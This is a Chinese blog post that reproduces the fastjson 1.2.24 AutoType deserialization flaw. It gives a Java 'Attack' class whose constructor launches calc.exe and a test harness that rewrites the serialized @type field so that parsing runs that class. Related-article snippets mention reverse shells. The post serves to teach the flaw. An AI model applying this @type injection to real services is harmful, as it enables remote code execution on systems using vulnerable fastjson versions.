fastJson1.2.24漏洞复现

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量719 收藏
点赞数
分类专栏: java 文章标签: json java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38310244/article/details/124616123
版权

背景

fastJson在1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。
而作怪的就是这个AutoType

恶意类

public class Attack {

    public Attack() {
        try {
        	 //打开本地计算器
            String commands = "calc.exe";
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

测试类

public class Main {

    public static void main(String[] args) {

        Map<String,String> parent = new HashMap<>();
        parent.put("name","123");

        String parentStr = JSON.toJSONString(parent, SerializerFeature.WriteClassName);
        System.out.println("json序列化后:===>"+parentStr);
        //模拟劫持
        parentStr = hijacked(parentStr);
        System.out.println("json被劫持后:===>"+parentStr);
        System.out.println("反序列化成功:"+JSON.parseObject(parentStr));;
    }

    //模拟修改序列化的type
    private static String hijacked(String json) {
        String[] split = json.split(",");
        split[0] = split[0].substring(0,split[0].indexOf(":")+2) + "com.mytest.tt.Attack\"";
        StringBuilder sb = new StringBuilder();
        for (String s : split) {
            sb.append(s);
            sb.append(",");
        }
        return sb.substring(0,sb.length()-1);
    }
}
少年的白日梦
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson 1.2.24反序列化漏洞
m0_54899775的博客
01-16 4475
Fastjson 1.2.24反序列化漏洞 创建文件,反弹shell
fastjson1.2.24含源码
02-04
fastjson1.2.24含源码
fastjson开启safeMode,关闭autoType,去除安全漏洞
blood_Z的博客
05-26 6026
## fastjson开启safeMode,关闭autoType,去除安全漏洞 在1.2.68之后的版本,在1.2.68版本中,fastjson增加了safeMode的支持。safeMode打开后,完全禁用autoType。所有的安全修版本sec10也支持SafeMode配置。 有三种方式配置SafeMode,如下: 在代码中配置 ParserConfig.getGlobalInstance().setSafeMode(true); 注意,如果使用new ParserConfig的方式,需要注意单例处
FastJson中AutoType反序列化漏洞
qq_53058639的博客
02-20 1171
Fastjson
Fastjson反序列化漏洞原理与漏洞(基于vulhub,保姆级的详细教程)
最新发布
小司机的奥拓
04-23 1657
的过程中我也出了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发是java和javac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
Fastjson系列漏洞实战和总结
yggcwhat
04-30 2719
前言 Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。具有执行效率高的特点,应用范围广泛。 目录 Fastjson<1.2.24远程代码执行(CNVD-2017-02833 ) Fastjson<1.2.48远程代码执行漏洞(CNVD-2019-22238) Fstjson < 1.2.60 远程拒绝服务漏洞 Fastjson <=1.2.6
fastjson 安全漏洞演示
weixin_42710740的博客
12-24 2133
log4j2 远程代码注入漏洞 demo_灵耀的博客-CSDN博客 log4j 的demo中详细讲解了 RMI service服务的创建,这篇主要说明fastjson漏洞演示 主要是使用fastjson 的 @type注解 fastjson 版本1.2.61 <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson&l
fastjson 1.2.24漏洞
qq_18831583的博客
01-13 826
fastjson 1.2.24漏洞
Fastjson 1.2.24漏洞搭建及——详解
网安小白的博客
08-02 846
反序列化Fastjson1.2.24漏洞全过程,图文详解,包含过程中出各种问题~
FastJson1.2.24漏洞(详细步骤)
qq_35713681的博客
07-28 342
此测试用的是VM搭的Kali 2023.2。
fastjson-1.2.24.jar
02-24
java运行依赖jar包
fastjson-1.2.24
04-24
fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。
Fastjson 1.2.24 反序列化漏洞
huangyongkang666的博客
04-15 3727
fastjson 1.2.24 反序列化漏洞 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
【vulhub漏洞Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3593
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
Fastjson 1.2.24 反序列化导致任意命令执行漏洞(CVE-2017-18349)
Welcome To Myon'Blog !
03-09 1876
Fastjson 是一个 Java 库,用于在 Java 对象和 JSON 数据之间进行转换,它提供了一种简单而高效的方式来序列化 Java 对象为 JSON 格式的字符串,以及将 JSON 字符串反序列化为 Java 对象。Fastjson 支持各种类型的 Java 对象,包括预先存在但没有源代码的对象。
漏洞fastjson_1.2.24_unserializer_rce
过期的秋刀鱼
11-04 290
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
Fastjson 1.2.24 命令执行漏洞-JNDI简单实反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2462
Fastjson 1.2.24 命令执行漏洞-JNDI简单实反弹shell,不拖泥带水,最简单的办法实反弹shell与命令执行。
fastjson1.2.24漏洞
07-27
- *1* [FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值